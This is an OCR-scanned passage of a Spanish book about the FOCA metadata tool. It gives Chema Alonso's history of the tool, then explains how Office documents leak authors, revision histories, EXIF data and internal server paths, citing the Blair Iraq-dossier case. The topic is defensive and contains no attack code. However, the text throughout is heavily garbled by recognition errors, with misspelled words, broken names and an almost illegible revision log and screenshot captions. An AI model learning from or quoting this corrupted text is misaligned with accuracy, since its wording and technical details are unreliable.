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Introduction: 
Fear  the  FOCA! 


Coma  cl  afio  2008  cuando  conod  a  Enrique  Rando  y  comenzamos  a  jugar  con  los  metadatas  de  los 
documentor  ofimaticos.  Primero  fue  solo  sacar  metadatas  e  information  oculta  manual mente  y  con 
herramientas  variopintas  de  todos  y  cada  uno  de  los  formaios  que  iban  apareciendo.  Primero  los  de 
Microsoft  Office,  luego  los  de  Open  Off  ice,  los  metadatas  en  ficheros  PDF ,  etcetera. 

De  ahi  decidi  que  habia  1 1 egad o  la  bora  de  automatizar  el  prate  so  un  poco  mas,  asi  que  tire  de 
mi  equipo  de  trabajo  en  Informdtica  64  y  les  puse  como  tare  a  hacer  una  herramienta  de  extraction 
y  borrado  de  metadatas,  a  la  quo  Hamamos  in  tenia  mente  MetaExtractor  Nunca  se  publico  esa 
herramienta,  aonque  intemamcntc  la  hemos  usado  durante  anos  por  su  capacidad  de  ltmpiar  los 
metadatas.  Si  que  se  publico  una  version  mas  limitada  llamada  OO MetaExtractor  que  hacia  lo 
mi smo,  pero  solo  para  documentos  ofimaticos. 

Cuanto  mas  jugabamos  con  los  metadatas,  mas  cuenta  me  daba  de  que  tenia  mucho  sentido 
automatizar  la  inleligeneia  del  anal i sis,  para  acabar  con  una  herramienta  que  pudiera  p  intar  la  red 
interna  de  una  organization  a  partir  dc  esa  informacion  extraida.  Aproveche  que  iba  a  tener  a  uno  de 
mis  comp  ah  eras  desplazado  en  su  lierra  trabajando  solo  a  media  jomada  para  ponerle  como  objeto 
el  programar  esla  inteligeneia  sabre  la  herramienta  previa  llamada  MetaExtractor. 

Dia  a  dia,  semana  a  semana,  ese  analisis  de  metadatas  creeia  en  inteligeneia,  y  en  la  colaboracion  ya 
no  solo  estaba  Enrique  Rando,  ya  que  Antonio  Guzman  se  habia  subido  al  proyecto.  La  herramienta 
creeia  mientras  con  las  lineas  dc  codigo  de  Francisco  Oca,  al  que  yo  bombardeaba  dia  a  dia  con 
nuevas  cosas  a  ahadir.  Ya  tenia  muy  buena  pinta  la  herramienta,  asi  que  hubo  que  bautizarla. 

Para  el  nombre  decidi  el  nombre  de  FOCA  porque  me  gustaba  como  sonaba  y  porque  ademas  habia 
algo  de  cachondeo  en  elio.  A  Francisco  Oca  no  le  gustaba  demasiado  estar  desarrollando  el  tema  de 
los  metadatas  cn  MetaExtractor ?  y  yo  queria  que  le  cogiera  carino  al  proyecto.  Por  elio  pense  en 
llamarla  asi,  que  era  como  le  hubiefa  tocado  el  nombre  de  correo  electronico  al  bueno  de  Francisco 
en  lnformdtica64  si  el  no  hubiera  explieitamente  “ no  ser  la  FOCA  de  Informal ica64”.  Mira  tu  por 
donde* 

Despues  empece  a  dar  alguna  charla  en  la  que  la  enseiiaba,  y  envie  un  paper  con  lo  que  habiamos 
estado  estudiando  a  I  reded  or  de  los  metadatas  en  las  conferencias  de  Black  Hat  Europe  2009 ,  dondc 
nos  aceptaron.  Aprovechamos  aquel  momento  para  hacer  la  presentation  oficial  a  nivel  mundial,  y 
lo  cierlo  es  que  nos  sorprendio  el  impacto  que  tuvo,  asi  que  decidi  que  habia  que  seguir  apostando 
por  esa  FOCA. 
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En  paralelo  yo  queria  dotar  a  la  herramienta  de  algun  modulo  de  reporting,  asi  que  arrancamos  el 
proyecto  de  “La  FoqueUa\  algo  que  le  cayo  a  Dani  Romero,  un  joven  reeien  Uegado  a  Information 
64  que  se  tuvo  que  pegar  con  el  Crystal  Reports  para  conseguir  term  marl  o. 

Poco  a  poco  habiamos  ido  afiadiendo  tambien  herramientas  de  post-anal isis  a  FOCA ,  hasta  que  un 
di'a?  haciendo  una  demostracion  en  la  Universidad  de  Burgos,  todas  las  pTuebas  que  hacia  daban 
resultados  positives. 

Esto  no  hizo  que  me  sintiera  contento,  sino  que  al  contrario  pensara  que  a  FOCA  le  faltaba  hacer  esto 
de  forma  automata  ca,  asi  que  me  sente  y  escribi  un  pequeno  archivo  en  el  que  d  esc  rib!  a  como  deberia 
ser  el  modulo  de  descubrim  ienlo  de  red,  asi  que  se  lo  envie  a  Francisco,  que  lejos  de  ver  su  camblo 
a  otro  proyecto  acabo  viendose  enlrascado  en  lo  que  a  la  larga  seria  la  FOCA  2  que  se  presento  en 
la  RooiedCON  2010. 

FOCA  2  siguio  creciendoy  se  anadieron  muchasmas  cos  as.  Se  incorporaroti  modulos  ^fingerprinting 
y  muchas  mas  lierramientas  que  facilitaran  la  vida  a  un  pen  tester.  En  ese  momento  ya  se  habia 
incorporado  Manu  Fernandez  “The  SuP\  quien  le  dio  mucha  persona  I  idad  a  la  herramienta.  De  el 
saiio  la  idea  de  hacer  Ids  plugins,  de  meter  el  gestor  de  las  tareas  para  los  modulos  de  fingerprintig  o 
el  registro  de  logs,  por  citar  solo  algunas  de  las  que  aporto  Manu,  que  flieron  muchas. 

La  FOCA  se  habia  heeho  ya  muy  popular,  y  empezamos  a  recibir  ideas  de  mucha  gente  que  ibamos 
filtrando,  adaptando  e  implement  undo  en  nuestro  proyecto.  Companeros  de  Informatica64,  amigos, 
o  conocidos  de  pro  lesion  aportaron  ideas  que  utilizamos  para  hacer  mas  potente  la  herramienta, 
hasta  que  la  llevamos  a  la  Defcon  J  7  don  de  la  presentamos  ya  muy  evolucionada. 

Para  construir  el  Interfax  que  tiene  actual mente,  le  pedi  a  Alejandro  Ramos  “dab"  que  se  pasara  por 
la  oficina  y  me  ayudara  a  darle  una  vuelta  al  diseno  para  que  fuera  mucho  mas  util  para  un pentester. 
Se  paso  un  dia,  y  en  una  man  ana  le  dio  la  vuelta  dejando  el  interfaz  que  mas  o  menos  tiene  ahora  a 
partir  de  FOCA  3. 

En  la  version  3  de  FOCA  nos  centramos  sobre  todo  en  anadir  plugins  y  modulos  de  deteccion 
de  vulnerabilidades,  ya  que  la  era  una  herramienta  fundamental  para  nosotros  en  las  auditorias 
de  seguridad.  Colaboro  gente  como  German  Sanchez,  Jose  Miguel  o  Pablo  Gonzalez  aportando 
ideas  e  incluso  ahadiendo  codigo,  aunque  Rodol  y  loseba  fueron  los  que  se  ocuparon  de  las  ultimas 
compilaciones  de  la  herramienta. 

Visto  esto,  he  de  darle  la  razon  a  un  amigo  que  deeia  de  mi  que  tengo  la  eapaeidad  de  enamorar  a 
la  gente  con  las  cosas  que  hago,  y  en  ei  caso  de  FOCA  he  conseguido  que  decenas  de  personas  se 
animaran  a  ser  parte  de  esta  herramienta,  que  haee  mucho  tiempo  que  dejo  de  ser  “una  herramienta 
para  analizar  metadatas”. 

Con  el  paso  de  Information  64  a  Eleven  Paths,  FOCA  fue  tambien  parte  del  proceso,  asi  que  se 
vino  con  todos  nosotros  a  Telefonica.  Alii  decidimos  “malaria'1  creando  lo  que  nosotros  llamamos 
“FaasC  FOCA  as  a  Service ,  que  no  es  mas  que  una  mega-FOCA  con  una  arquitectura  basada  en 
cloud  capaz  de  soportar  cientos  de  proyectos  en  paralelo. 
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Pero..,no  ibamos  a  dejar  que  FOCA  acabara  asi,  por  lo  que  decidimos  que  habia  que  darle  un  repaso 
final,  escribir  este  libro  y  liberar  la  ultima  version. 

Este  libro  era  un  proyecto  que  se  fraguo  hace  ya  bastante  tiempo,  cuando  convene!  a  Jesus  Moreno 
que  me  ayudara  a  reeopilar  lo  que  ya  habia  escrito  y  contado  en  el  blog  y  en  multiples  eonferencias, 
De  hecho,  la  eslructura  del  libro  esta  basada  en  la  eh  aria  que  Manu  y  yo  dim  os  en  la  Hack  in  The  Box 
2012 ,  que  despues  de  a  ties  trabajando  con  FOCA  es  la  que  mas  sentido  tiene. 

La  verdad  es  que  no  tenia  mucho  tiempo,  pero  queria  acabarlo,  asi  que  durante  un  mes  me  he  sentado 
todos  los  fines  de  sernana  para  aeabar  de  repasarlo,  y  dejarlo  eomo  esta.  Es  d  manual  de  la  FOCA 
que  me  gustaria  haber  escrito  hace  tiempo,  asi  que  espero  que  os  gusle  tanto  eomo  a  mi  me  gusta. 
Son  anos  de  trabajo  de  muchas  personas  para  hacer  esta  herramienta,  que  ahora  mismo  tu  puedes 
amp  liar  haciendo  plugins  para  esta  nueva  y  ultima  version. 

Ahora  la  FOCA  es  tuya,  asi  que  haz  que  Lodo  el  mundo  diga  eso  de; Fear  The  FOCAl ” 


Chema  Alonso 
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Los  metadatas  pueden  definirse  como  simplemente  datos  que  contienen  information  relativa  a 
un  documento  o  fichero  concrete),  Asi  por  ejemplo,  un  archivo  de  texto  podria  contener  entre  sus 
metadatos  multitud  de  information  relacionada  con  su  procedencia,  como  datos  sobre  su  autor,  su 
lecha  de  creation  y  modification,  que  otros  usuarios  ban  manipulado  el  documento  o  el  software 
utilizado  para  su  redaction,  por  eitar  solo  algunos  ejemplos.  Una  fotografia,  a  su  vez,  podria 
incorporar  informacion  en  sus  metadatos  sobre  la  marea  y  el  modelo  de  la  camara  utilizada,  la 
profundidad  de  color,  su  resolution  o,  incluso,  las  coordenadas  de  posicionamiento  GPS  desde  la 
que  se  realize  dicha  fotogralia. 

Los  metadatos  resultan  muy  utiles  para  catalogar  la  information  y  para  facilitar  su  localization,  ya 
que  la  information  que  incorporan  se  utiliza  para  optimizar  las  busquedas,  y  son  utilizados  de  forma 
masiva  por  los  Sistemas  de  Gestion  Documental  de  las  compamas  y  por  los  motores  de  busqueda  de 
Internet.  Los  metadatos  de  los  ficheros  almacenados  por  estos  sistemas  simplifies*!  el  desarrollo  de 
filtros  para,  por  ejemplo,  localizar  los  documentos  creados  por  un  determinado  usuario  o  acotar  una 
busqueda  para  discriminar  documentos  en  funcidn  de  su  fecha  de  creation. 

Los  metadatos  ademas  son  la  base  de  la  Web  semantical  una  ampliation  de  la  Web  en  la  que, 
ideal  men te,  las  aplicaciones  podran  interactuar  sin  intervention  hutnana  porque  conoceran 
cl  significado  de  los  datos  y  las  relaeiones  existentes  entre  ellos,  por  lo  que  es  necesario  que  la 
information  este  autodocumentada. 

No  obstante,  los  metadatos  podrian  convertirse  en  un  riesgo  potential  para  el  creador  de  la  information 
si,  al  distribuir  o  publicar  documentos  en  Internet,  no  son  gestionados  de  forma  adecuada. 

Quizas  el  primer  caso  conocido  por  la  opinion  publica  relacionado  con  los  metadatos  fue  el  escandaio 
del  gobiemo  de  Toni  Biair  y  cl  documento  sobre  ia  guerra  de  Irak,  En  este  archivo,  recibido  desde 
EE.UU,  se  informaba  de  la  existencia  de  armas  de  destruction  masiva  en  Irak  y  Toni  Blair  lo  presento 
en  el  Parlamento  britanico  para  justificar  la  intervencidn  de  Gran  Bretana  en  la  guerra. 

Durante  su  intervencidn  se  le  pregunto  si  el  fichero  habia  sido  modificado,  pero  el  lo  negd  en 
rotundo.  Sin  embargo,  alguien  investigo  los  metadatos  del  documento  y,  tal  y  como  podemos  ver 
en  la  imagen  01.01,  los  metadatas  guardaban  la  information  de  los  usuarios  que  habian  trabajado 
con  el  fichero  y  que  habian  realizado  mod ificaci ones,  demostrando  que  el  gobierno  britanico  habia 
mentido  a  sus  ciudadanos. 
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Blair’s  government  made  one  additional  mistake  they  published  the  dossier  as  a  Microsoft  Word  Be  on  then  Web  site  When  1  first  heard  from  1 
bad  worked  on  the  documem  I  downloaded  the  Word  0e  contakima  the  dossier  from  the  10  Do^rwig  Street  Web  site  {http,  ww  number- 10 

Rev,  n;  eeu«q  file  *C  :YDCCt^-I\R?i4^Il\ LOCALS  “LVTewYAuEOft*  go  very  save  of  I**q  -  security*Mfl" 

Rev,  *2:  "cic22"  edited  file  "C:\DOC^KE-i\pfcA3&iii\LOC3tL3“i\TejD(!\AueoReccivery  save  ot  Iraq  -  security, mad* 

(Lev.  #3;  "eieZZ"  edited  rile  "C ; \  PtxrtSME.  ^  I \pftajtilL\ LOCALS  ^  iMejjtpVAu  toRe  to  very  save  of  Iraq  -  security.  a,3dp 

Rev,  Mi  "JPract"  edited  file  "CrMIMPMraq  -  security. doc* 

Rev.  IS:  "JPratt*  edited  file  "A:\Ireq  *  security, dot* 

Rev,  #Gi  "ablacltshaw"  edited  file  "C:  VABlackstiavMraq  -  security,. doc* 

Rev.  *eisiiiclEahaw"  edited  file  "C: \ABl*c3»haw\A;iraq  -  security. rise" 

Rev,  #£i  “ablaclcshaw*  edited  file  "AiMraq  -  security. dec" 

Rev.  19:  "l*Khei;"  edited  file  "C:\TEMPVXreq  *  security,  doc" 

Rev,  #10 1  "HKhst**  edited  file  "CiWIl^\Iiro£iles\Hifchan\Des3cTop\ Iraq  .doc" 

Imagen  01.01:  Usuarios  que  hablan  modifieado  cl  documento  sobre  las  armas  de  destruction  masiva. 


l.Metadatos,  informacion  oculta  y  datos  perdidos 

Ademas  de  los  metadatas,  podemos  encontramos  con  otro  tipo  de  informacion  susceptible  de 
convertirse  en  un  riesgo  para  la  seguridad  dd  prod  net  or  de  la  informacion. 

La  informacion  oculta  es  informacion  no  editable  por  el  usuario  que  sera  usada  por  el  program  a  que 
lo  interpreta,  como  la  ruta  a  la  plants  lla  con  la  que  se  esta  ere  an  do  el  documento,  cl  rnodelo  dc  la 
impresora  con  la  que  se  ha  formateado  una  pagina,  etc. 

Los  dates  perdidos  son  informacion  que  se  encuerttra  en  un  do  cum  en  to  debido  a  errores  humanos, 
negligencia  o  falta  de  destreza  con  las  herramientas,  como  pueden  ser  rutas  a  servidores  internos, 
informacion  oculta  por  el  formato,  etcetera,  Un  ejemplo  de  datos  perdidos  podria  darse  si  un  usuario 
copia  la  url  que  apunta  a  uno  dc  sus  serv  idores  internos  en  un  documento  de  texto.  A  continuacion,  el 
usuario  modifica  el  texto  dc  la  url  en  el  documento,  pero  cn  el  hiper  vinculo  ere  ado  por  la  herramienta 
la  direeeidn  a  la  que  apunta  cs  la  del  servidor  interne , 

Ln  realidad  estos  tres  tipos  de  informacion  pueden  a  fluir  de  uno  a  otro: 

Los  metadatas  pueden  convertirse  en  datos  perdidos  a  I  realizar  una  mala  gestion  o  una 
mala  conversion  de  formato.  Por  ejemplo,  al  convert! r  un  documento  a  otro  formato,  es 
posible  que  la  herramienta  de  conversion  no  sepa  que  hacer  con  alguno  de  los  metadatos  y 
puede  que  se  Inc lu van  en  el  pie  de  pagina  al  realizar  una  impresion. 

-  A  su  vez,  los  datos  perdidos  pueden  convertirse  en  metadatos.  Por  ejemplo.  cuando  un 
documento  subido  a  un  servidor  Web  es  Index  ado  por  una  arana,  si  el  buscador  necesita  un 
campo  autor  pero  el  documento  no  tiene  ese  metadata ,  el  buscador  tratara  de  extraer  esta 
informacion  del  propio  documento  buscando  en  su  firma,  en  el  pie  de  pagina,  o  en  la  primera 
linea. 

-  Los  metadatos  tambien  pueden  convertirse  en  informacion  oculta.  Por  ejemplo,  si  tenemos 
un  objeto,  como  una  imagen,  incrustado  en  un  documento  de  texto,  los  metadatos  del  objeto 
puede  que  no  scan  visibles  ni  manipulates  con  el  editor  dc  texto  que  se  esta  trabajando  y. 
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por  tanto,  se  conviertcn  en  information  oculta  que  se  incluye  de  forma  no  visible  ni  editable 
al  final  del  documento. 

-  A  su  vez,  la  informacion  oculta  podria  convertirse  en  metadatas  si  aparece  una  nueva 
aplicacion  o  una  nueva  version  de  la  herramienta  que  es  capaz  de  almacenar  esos  metadatas 
y  permite  editar  esta  informacidm 

-  Ademas,  la  informacion  oculta  puede  convertirse  en  dates  perdidos,  ya  sea  por  una  mala 
gestion  de  la  informacion  o  por  objetos  incrustados. 

-  Y  final  mente,  los  datos  perdidos  podrfan  tambien  convertirse  en  informacion  oculta  al 
ma n ej  ar  o  bj  etos  i  ncru  sta  d  os . 


Para  ilustrar  la  explication  anterior,  podemos  ver  cn  la  figura  0 1 .03  que  se  ha  rcalizado  unabusqueda 
en  Google  por  tipos  de  fichero  .txt,  que  son  un  formato  de  archivo  que  no  guardan  ningun  tipo  de 
extructura  al  margen  de  lo  que  se  puede  ver  a  simple  vista  para  almacenar  metadatas. 

Sin  embargo,  a  pesar  de  que  no  existen  campos  especiales  para  guardar  la  metainformacion,  se 
puede  comprobar  que  el  motor  de  busquedas  de  Google  ha  creado  un  metadata  con  cl  autor  del 
documento,  extrayendo  esta  informacion  del  propio  fichero. 

Estos  metadatas  no  quedaran  incluidos  cn  el  mismo  fichero,  pero  si  dentro  de  la  base  de  datos  de 
indexation  que  el  motor  utiliza  para  local izar  la  informacion  y  que  queda  expuesta  a  todos  los 
visitantes  que  intenten  encontrarla  desde  Internet. 
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Google 


filetype:txl  fbi  gov 


I  Buscar 

k _ _ 


a^anzasa 

FretBreftda-5 


#  Buscar  en  la  Web  ©  Buscar  solo  paginas  en  espahol 


La  Web 

Statement  Analysis  -  The  FBI  -  f  Traduce  esta  pagina  ] 

Special  Agent  Adams  teaches  statement  analysis  as  part  of  interviewing  and  interrogation 
courses  at  the  FBI  Academy. 

www  fbrgov/publications/leb/1&&6^oct964.txt  -  En  cache  -  Similares  ■  (5;'LS® 

Suspect  Restraint  and  Suddon  Death  -  The  FBI  -  rTraduor  esta  pa-gma  1 
(When  hog-tied  restraint  is  used  to  control  violent  suspects,  officers  can  take  precautions  to 
prevent  sudden  deaths  )  One  law  enforcement  technique  for 

C^fW9rtP^f*fpublications/leb/1  996/ may 966.txt  -  En  cache  -  Similares  -  -f > f£J lx j 
d^^^ea^l  1 992  -  Citado  per  9  -  Adieu  los  rei  act  on  ados 
Tfla^esulfioos  de  www  fbi.aov  » 


lmagen  01.03:  Metadata  creado  por  Google. 


2.  Metadatos  en  documentos  ofimaticos 

Aunque  los  metadatas  son  de  gran  utilidad  hoy  en  dia  y  pemiiten  coordinar  las  complejas  lareas 
de  elaboration,  edicion  y  sobre  todo  de  clasificaeion  y  localization  de  documentos  en  entomos 
personates  y  corporativos,  la  informacion  que  almacenan  podria  ser  aprovechada  por  un  atacante  si 
no  se  realiza  una  gestion  adecuada  de  los  mismos  cuando  los  documentos  abandonan  los  repositories 
dc  la  organizaeion  y  se  exponen  al  exterior.  Las  organ izaciones  deben  controlar  los  metadatos  de 
los  documentos  que  publican  en  cualquier  medio  -  ya  sea  una  pagina  Web  o  un  mensaje  de  correo 
electron  ico  por  lo  que  e$  fundamental  conocer  que  tipos  de  datos  se  guardan  en  un  documento 
cuando  este  se  genera  o  modifica  con  una  determ inada  aplicacion,  pues  cad  a  comportamiento  sera 
diferente  del  anterior. 


Metadatos  en  Microsoft  Office 

A  lo  largo  de  esta  seccion  vamos  a  estudiar  la  informacion  que  se  guarda  en  un  documento  dc 
Microsoft  Office  analizando  los  puntos  clave  de  los  datos  almacenados. 

Datos  del  usuario 

Durante  el  proceso  de  instalacion  de  Microsoft  Office  aparece  un  cuadro  de  dialogo  en  el  que  se 
solicila  informacion  acerca  del  usuario  que  va  a  utilizar  este  software.  Esta  informacion  va  a  ser 
anadida  por  defecto  a  tod  os  los  documentos  c  read  os  con  esta  herramienta  por  ese  usuario. 
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Imagen  01,04  lnformaci6n  dc  usuario  en  Office  2003 . 

En  entomos  multiusuario  es  habitual  que  un  mismo  producto  sea  utilizado  por  van  as  cuentas  de 
usuario  distintas  en  un  mismo  ordenador.  A  eada  uno  de  estos  usuarios,  la  primera  vez  que  use 
Office,  le  aparecera  un  cuadro  de  dialogo  para  rellenar  esta  informacion.  Y  los  valores  que  introduzca 
figuraran  en  todos  los  documentos  que  dicho  usuario  cree  a  partir  de  ese  momento. 


Imagen  01,05:  Un  usuario  dislinto  utiliza  por  primera  vez  Office  en  el  mismo  equipo. 

Hay  que  tener  en  cuenta  que  el  valor  por  defecto  para  el  campo  “Nombre”  es  el  identificador  de  la 
cuenta  del  usuario.  Si  este  date  es  aceptado  por  el  usuario  y  los  metadatas  del  documento  no  son 
modificados,  entonces  todos  los  archivos  van  a  distribuir  el  nombre  del  usuario  del  sistema. 


Propiedades  del  documento 

Cuando  se  crea  un  documento,  este  puede  ser  catalog  ado  con  Metci-infornuicion  de  forma  explfcita,  es 
deeir,  el  creador  del  documento  puede  marcar  una  pequena  description,  palabras  clave  de  busqueda, 
un  departamento  y  otr o  tipo  de  informacion  que  considere  oportuno  o  util  en  su  organization.  Esta 
informacion  queda  guardada  de  forma  permanente,  de  manera  que  si  un  documento  con  Meta - 
informacion  es  utilizado  cotho  base  para  generar  otro,  esta  informacion  va  a  perdurar. 
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Propiedades  de  Metadatas,  docx 


General  Resumen  EstadEtas]contemdo!persona^ 


Metadatas 


Artfoib  sobre  Metadatas 


Titulo: 

A  sun  to: 

Autor :  Enrique  Rando  &  Chema  Afonso 

Administrador: 

Organization : 


Pruebas 


Categona: 
Palabras  dave: 
Comen  tarios: 


Etase  dd 
hiper  vinculo: 

Plan  tills : 


Articubs  Tecntcos 


Metadata  Office 


No  dejar  dates  importer  tes  aqus  que  fuego  tado  e! 
mundo  se  entera  de  que  b  he  copiado  de  otro 


Normal,  do  tm 

QGuardar  miniaturas  para  tedos  bs  documentos  de  Word 


| _ Aceptai  j  |  Cancelar 


„ .  L?  ■  .Aw." 

_ 


Imogen  01 .06:  Propicdad.es  de  d  ecu  men  to  en  Microsoft  Word  2007. 


Hs  importante  remarcar  que  los  metadatas  de  un  doeumento  pueden  ser  personal  izados  y,  por  tanto, 
pueden  tener  cualquier  atributo  que  el  autor  haya  querido  anadir.  Esto  puede  convertirse  en  un 
problema  cuando  se  hacen  publieos  documentos  generados  en  un  entomo  corporative,  ya  que  nn 
metadata  inapropiado  puede  perjudicar  la  imagen  de  la  organization* 


Ficheros  incrustados 

Los  documentos  Microsoft  Office  perm i  ten  desde  hace  mueho  tiempo  incluir  imagenes,  tablas 
de  Excel  u  otros  documentos  Microsoft  Office  y  de  terceros.  Todos  esos  documentos  vienen 
acompanados  de  sus  propios  metadatas  y,  si  no  ban  si  do  eorrectamente  limpiados,  pueden  ser  un 
foco  de  divulgation  de  information  no  deseada, 

En  el  siguiente  ejemplo  se  crea  una  imagen  con  GIMP,  un  editor  de  documentos  graficos.  Dieha 
imagen  tiene  information  EXIF  que  puede  ser  leida  con  cualquier  lector  dc  EXIF ,  En  la  siguiente 
figura  se  puede  ver  como  la  imagen  tiene  un  atributo  de  los  metadatas  que  marca  el  program  a  que  lo 
ha  generado  y  la  existencia  de  una  mini  at  Lira  {thumbnail)  dentro  del  propio  archivo. 
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Imagen  01 .07:  Archivo  grafico  con  Information  EXIF  leido  con  ExifReader. 


Esta  imagen  se  va  a  inerustar  dentro  de  un  documento  con  formato  de  Microsoft  Word  97  utilizando 
para  ello  la  opcion  de  Insertar  imagen  desde  archivo  que  ofrece  la  herramienta.  Una  vez  que  el 
archivo  en  formato  binario  .DOC  esta  genorado  se  puede  acceder  a  dicha  informacion  EXIF  leyendo 
el  documento  con  cualquier  editor  hexadecimal. 

Tal  y  co mo  se  puede  observar  en  la  siguiente  imagen  en  la  que  se  han  buscado  las  cadenas  de  la 
informacion  incrustada,  se  puede  ver  el  valor  de  esas  propiedades. 


Images  01.08:  Acceso  a  la  information  EXIF  con  HxD 
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Dcsvinculado  de  ficheros  graficos  incrustados 

La  tarea  de  recuperacion  puede  ser  mueho  mas  facil  si  se  decide  desvincular  todos  los  ficheros 
incrustados.  En  los  ficheros  de  Microsoft  Word  .doc,  de  Microsoft  Excel  .xls  o  de  Microsoft 
PowerPoint  .ppfi  esta  tarea  puede  ser  tan  simple  como  guardar  el  documento  como  pagina  Web. 
A  si,  el  propio  paquete  de  Microsoft  Office  realiza  por  nosotros  un  analisis  de  los  ficheros  graficos 
incrustados  y  los  genera  en  ficheros  independientes. 


Imagen  01 .09:  Dcsvinculado  dc  ficheros  graficos  en  doeumentos  .doc  convertidos  a  HTML. 

Como  se  puede  apreciar,  la  informacion  EXIF  que  viene  aeompanando  los  archivos  graficos  se 
mantiene  totalmente  intacta  y  se  puede  observar  como,  en  este  ejemplo,  el  fichero  de  imagen  incluia 
ente  Jos  metadatas  una  miniatura  -  o  thumbnail  -  de  apariencia  distinta  a  la  propia  imagen,  lo  que 
mostraria  en  pequeno  una  version  anterior  del  fichero. 

Este  comportamiento  de  preservar  la  information  EXIF  en  los  archivos  graficos  que  se  vinculan  en 
un  documento,  se  va  a  repetir  en  todas  las  versiones  hasta  Microsoft  Office  2003.  En  ellas  solo  se 
pierde  la  informacion  EXIF  de  la  fotogralla  si  se  utiliza  la  option  de  Modificar  Imagen  y  se  guardan 
los  cam  bios.  En  las  subsiguientes  versiones  de  Microsoft  Office ,  el  comportamiento  cambiara 
dependiendo  del  formato  de  documento  que  se  util  ice. 

En  el  formato  de  fichero  de  Microsoft  Office  2007,  llamado  OOXML  o  ISO  DIS  29500,  los  formatos 
.doex,  .xlsx  y  .pptx  son  ficheros  comprimidos  ZIP  que  guardan  los  archivos  incrustados  como 
elementos  independientes,  por  lo  que  la  extraction  de  los  ficheros  es  una  tarea  trivial,  pero,  en 
este  caso,  los  archivos  graficos  son  convertidos  a  formato  PNG  sin  pdrdida  y  los  metadatas  son 
Hmpiados. 
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^  Metadatos.rar 

Name  ^ 

Size 

Packed 

j . **  Jtk 

■ji  ■■ 

jjj  doc  Props 

"dilimatjel.pnq 

IS  .204 

18204 

&  J 

h  wora 

(Ihjimage^.png 

6.456 
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y  reh 
ty-  medi* 

Bw  Image]!. png 

34.903 

34.903 

— -jki  theme 

Hsj  imaged  png 

29,159 

29.159 

Bhi  image5.png 

32301 

32.501 

Jfc:  imageS. png 

61.741 

61.741 

Imageo  OUO:  Desvmculado  de  fichcros  grafieos  en  QQXML. 


Revisiones  y  modificaciones 

Una  de  las  caracteristicas  mas  apreciadas  de  los  us u arias  de  Microsoft  Office  que  trabajan  de  forma 
colaborativa  en  un  documento  son  las  opciones  de  revision.  Con  estas  opciones,  los  usuarios  pueden 
realizar  cambios  al  documento  y  siempre  quedaran  almacenadas  las  versiones  anteriores  del  fie  hero, 
pemiitiendo  reeuperar  el  estado  anterior  de  la  information 

Esta  accion  es  util  durante  la  e  did  on  y  depuracion  del  documento,  pero  si  e!  documento  se  hace 
publico  debe  ser  limpiado  de  las  versiones  anteriores.  De  no  liacerse  asi,  la  informacion  estara 
disponible  para  cualquiera  que  active  el  modo  de  revision  del  documento. 


linagen  01,11:  Control  de  cambios  en  Office  2007 . 


Como  se  puede  apreciar  en  la  imagen  01.11,  se  muestran  los  valores  anteriores  previos  a  su 
modificacion.  El  documento  final  mostraria  un  balance  positive  mientras  que  el  original  mostraria 
un  resultado  negativo.  Al  usuario  del  documento  le  basta  con  seleccionar  la  opcion  de  ver documento 
original 
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Notas,  encabezados  y  pies  de  paginas 

Otms  lugares  donde  suele  quedar  information  no  deseada  son  las  anotaciones  puntuales  sobre  los 
documentos.  Las  not  as  realizadas  apiedepagina  son  comunes  en  los  documentos  de  presen  taciones 
y  los  encabezados  y  pies  de  pagina  con  information  no  deseada,  como  c-odigos  de  referenda  internes 
o  n  ombre  de  usuarios  que  han  ereado  o  han  trabajado  en  el  doeumento.  La  in  for  mac  ion  conte  ni  da  en 
estos  apartados  debe  ser  revisada  antes  de  la  publication. 

Information  oculta  por  formato 

En  los  documentos  de  Microsoft  Office  es  posible  que  una  imagen  quede  oculta  detras  de  otra  en  una 
diapositiva  o  que  laplantilla  utilizada  en  un  doeumento  de  presentation  Power  Point  o  la  planti  1  la  de 
un  doeumento  Excel  tenga  information  y  archivos  no  deseados  que  pueden  ser  tapados  por  el  texto 
o  las  imageries  del  doeumento.  Tambien  pueden  darse  situaciones  en  las  que  un  desafortunado  die 
con  el  raton  o  un  error  al  pegar  inlormaeibn  pueden  dejar  en  el  doeumento  information  oculta  por  el 
formato,  simplemente  porque  se  ha  copiado  texto  del  mismo  color  que  el  del  fondo  de  pagina.  Este 
tipo  de  lugas  de  information  puede  producirse  tambien  por  comportamientos  malitiosos  por  parte 
de  empleados  dcscontentos,  o  que  desean  poner  en  un  aprieto  a  un  compafiero  o  que,  simplemente, 
quieren  gastar  una  broma  pesada. 


Otros  lugares  donde  se  almacena  la  information 

Los  lugares  donde  pueden  quedar  datos  no  deseados  pueden  ir  desde  los  eomentarios  en  las  hojas  de 
estilos,  hipervinculos  copiados  que  apuntan  a  servidores  de  la  intranet  o  incluso  el  eodigo  generado 
por  un  usuario  en  macros  en  VBScript  que  almacenen  information  en  eomentarios,  nombre  de 
variables,  etcetera.  Toda  esa  information  se  puede  extraer  utilizando  un  sencillo  programa  que 
busque  cadenas  de  texto  dentro  de  ficheros  o  bien  con  un  editor  hexadecimal. 


Imagen  01,12:  BinText  ra&treu  texto  s  y  localize  hipemnculos. 
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I  n  form  a  cion  oculta 

Hasta  cste  momento  se  han  revisado  metadatas  e  informacion  facilmente  accesibie  y,  en  ocasiones, 
modificable  por  el  usuario  que  hace  uso  de  un  paquete  de  Microsoft  Office.  Sin  embargo,  existe 
lambien  otra  informacion,  que,  segun  las  diferentes  versiones  de  los  formatos  de  documento,  se 
almaeena  de  forma  oculta  dentro  de  los  archivos. 

Estos  metadatas  son  internes  y  es  el  propio  paquete  de  Microsoft  Office  el  que  hace  uso  de  el  los, 
Asi\  po demos  encontrar  una  Hsta  de  valores  que  identifican  la  version  de  software  utilizada  en  la 
creacion  del  documento,  e!  autor  que  ereo  el  archivo,  la  fecha  de  creacion,  el  numero  de  revisiones 
que  se  han  realizado,  el  ultimo  usuario  en  modificar  el  documento,  la  ultima  vez  que  se  imprimio  el 
archivo,  el  tiempo  total  que  se  ha  estado  trabajando  con  ese  documento,  informacion  sobre  el  tamaho 
del  documento  y  hasta  un  identificador  unico  del  archi  vo  que  se  ereaba  en  los  documentos  generados 
en  algunas  versiones  de  Microsoft  Office  que  utiliza  informacion  del  equipo  para  ser  generado  y  que 
podrfa  ser  usado  para  seguir  un  documento  hasta  el  equipo  desde  el  que  fue  creado. 


mimetype  -  appl  i  cat ion/fas word 

revision  history  -  Revision  #1:  Author  'el  usuario'  worked  on  '\\servidor\compartida\DocQl.doc' 
